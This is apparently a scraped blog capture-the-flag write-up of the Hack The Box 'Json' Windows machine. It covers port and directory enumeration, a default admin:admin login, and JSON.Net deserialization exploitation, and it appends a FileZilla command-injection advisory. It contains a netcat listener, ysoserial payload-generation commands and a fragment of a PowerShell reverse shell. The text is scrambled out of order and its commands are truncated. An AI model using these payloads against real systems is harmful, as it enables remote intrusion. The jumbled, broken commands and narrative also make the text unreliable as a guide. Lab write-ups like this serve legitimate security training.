![]() ![]() Now let’s setup our listener: nc -nlvp 1234 The result is a base64 encoded output which we will copy to our clipboard: The payload.ps1 file contains the code for a standard PowerShell reverse shell: cmd /c powershell -nop -c " $client = New-Object ('',1234) $stream = $client. \ysoserial.exe -o raw -g WindowsIdentity -f Json.Net -o base64 -s ![]() Refining our command to fit our needs we end up with the following: PS > cat payload.ps1 |. In these slides we see a tool that may be of use called where an example is given to create a payload that pings a machine: ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -base64 -c "ping 10.0.0.19". On doing some research online we come across many articles on deserialization and specifically what has been coined Friday the 13th JSON Attacks. We are presented with the dashboard that we got a glimpse of:Īnalyzing the login with Burp Suite we notice the POST call to /api/token/ with Accept: application/json and Content-Type: application/json in the header. Like every login page we come across we try the credentials admin:admin which logs us in. So this site is custom not a known web app. I recognise it immediately as a Bootstrap dashboard theme by StartBootstrap. Although this looks like it may be a web app I notice the title of the page as SB Admin 2. The slow load shows me a dashboard and then redirects to the login.html page. We have a password.txt file! Taking a look at that file all we see is: Jajaja Let’s check the files directory as well: gobuster dir -u -r -t 30 -w /usr/share/wordlists/dirb/big.txt -x. We find some interesting files but no more directories. Let’s dig a bit deeper by looking in to views: gobuster dir -u -r -t 30 -w /usr/share/wordlists/dirb/big.txt -x. We see two directories of interest files and views. Wordlist: /usr/share/wordlists/dirb/big.txt aspx -o gobuster_dir-main.txtīy OJ Reeves ) & Christian Mehlmauer ) = Url: Directory Bruteforceĭoing a scan with Gobuster using the dir mode reveals some files and directories: gobuster dir -u -r -t 30 -w /usr/share/wordlists/dirb/big.txt -x. Using the searchsploit command we see no immediate results pertaining to the versions found. We see a version number for IIS but we don’t see one for FileZilla.Ī quick connection with netcat reveals that information: nc json.htb 21 Ports to take note of here are ftp on port 22, winrm on port 5985 and then there is also smb on port 445, netbios on port 139 and various rpc ports. ![]() |_ Message signing enabled but not required |_ message_signing: disabled (dangerous, but default ) |_smb-os-discovery: ERROR: Script execution failed (use -d to debug ) |_nbstat: NetBIOS name: JSON, NetBIOS user:, NetBIOS MAC: 00:50:56:b9:98:ae (VMware ) Service Info: OSs: Windows, Windows Server 2008 R2 - 2012 CPE: cpe:/o:microsoft:windows |_http-server-header: Microsoft-HTTPAPI/2.0Ĥ7001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP )Ĥ9152/tcp open msrpc Microsoft Windows RPCĤ9153/tcp open msrpc Microsoft Windows RPCĤ9154/tcp open msrpc Microsoft Windows RPCĤ9155/tcp open msrpc Microsoft Windows RPCĤ9156/tcp open msrpc Microsoft Windows RPCĤ9157/tcp open msrpc Microsoft Windows RPCĤ9158/tcp open msrpc Microsoft Windows RPC Nmap scan report for json.htb (10.10.10.158 )ġ39/tcp open netbios-ssn Microsoft Windows netbios-ssnĤ45/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-dsĥ985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP ) Let’s take a look at the machine and see what we are dealing with. Like always, enumeration is our first port of call. It was obvious as to what needed to be done it was just a matter of finding the right payload and the correct injection point.īe sure to checkout the Basic Setup section before you get started. I didn’t find anything too overly complicated with this machine. It tests your knowledge in OSINT, JSON Deserialization and basic Privilege Escalation. ![]() cpe:2.3:a:filezilla:filezilla:3.43.Json is a medium difficulty machine running Windows.Successful exploitation of this vulnerability may result in complete compromise of vulnerable system. A remote unauthenticated attacker that controls a remote server can trick the victim to connect to a malicious server to open a file with a specially crafted filename and execute arbitrary OS commands on the target system. The vulnerability exists due to insufficient validation of filenames that contain double-quotation marks when opening or editing files. The vulnerability allows a remote attacker to execute arbitrary shell commands on the target system. CWE-ID: CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |